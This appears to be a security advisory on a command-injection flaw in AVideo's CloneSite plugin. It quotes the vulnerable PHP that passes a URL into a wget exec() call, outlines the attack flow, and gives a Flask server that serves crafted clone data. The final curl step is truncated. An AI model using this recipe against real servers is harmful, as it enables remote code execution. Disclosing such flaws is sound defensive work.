Description
The cloneServer.json.php endpoint in the CloneSite plugin constructs shell commands using user-controlled input (url parameter) without proper sanitization. The input is directly concatenated into a wget command executed via exec(), allowing command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., ;). This leads to Remote Code Execution (RCE) on the server.
Inside plugin/CloneSite/cloneClient.json.php(line112) didn't have proper sanitization
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));
use str_replace make ' added by escapeshellarg become so hacker can inject evil cloneSiteURL to rce
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; \\116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; \\117
exec($cmd . " 2>&1", $output, $return_val); \\119
The attack flow
make a evil site to provide date
add evil url in objects/pluginAddDataObject.json.php
access plugin/CloneSite/cloneClient.json.php to trigger rce
make a evil site use python like this
from flask import Flask, jsonify, request
app = Flask(__name__)
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
print("PATH:", path)
return jsonify({
"error": False,
"msg": "",
"url": "http://target-site.com/",
"key": "target_clone_key",
"useRsync": 0,
"videosDir": "/var/www/html/AVideo/videos/",
"sqlFile": "Clone_mysqlDump_evil123.sql",
"videoFiles": [],
"photoFiles": []
})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8071)
change url with payload like (need admin)
curl -b 'PHPSESSID=<admin_session>'
-X POST...
Exploitability
AV:NAC:LAT:NPR:NUI:PVulnerable System
VC:HVI:HVA:HSubsequent System
SC:NSI:NSA:N8.7/CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N